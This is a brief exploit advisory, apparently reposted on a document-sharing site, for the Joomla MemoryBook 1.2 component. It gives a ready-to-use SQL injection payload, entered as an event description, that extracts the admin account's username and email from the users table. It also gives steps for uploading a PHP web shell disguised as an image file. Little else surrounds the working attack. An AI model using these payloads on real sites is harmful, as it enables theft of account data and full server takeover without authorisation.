Joomla Component MemoryBook 1.2 Multiple Vulnerabilities by h3m4n

VIEWS: 663 PAGES: 1

									                           Joomla Component MemoryBook 1.2 Multiple Vulnerabilities   Page 1/1
      1    SQL Injection
      2    −−−−−−−−−−−−−
      3
      4    requires: magic quotes OFF, user account
      5
      6    Add this as the description of a new event:
      7
      8    ’), ( 63,(SELECT CONCAT(username,0x20,email) FROM #__users WHERE gid=25
      9    LIMIT 1),1,1,1) −− ’
      10
      11   NOTE: 63 MUST be your Joomla user ID. extracted info can be found on
      12   View Events page
      13
      14
      15   Remote File Inclusion
      16   −−−−−−−−−−−−−−−−−−−−−
      17
      18   requires: user account
      19
      20   Just upload your PHP shell (shell.jpg.php) through the Add Image screen,
      21   and find it’s new URL in the View Images screen.




jdc                                                                                   12/27/2009

								
To top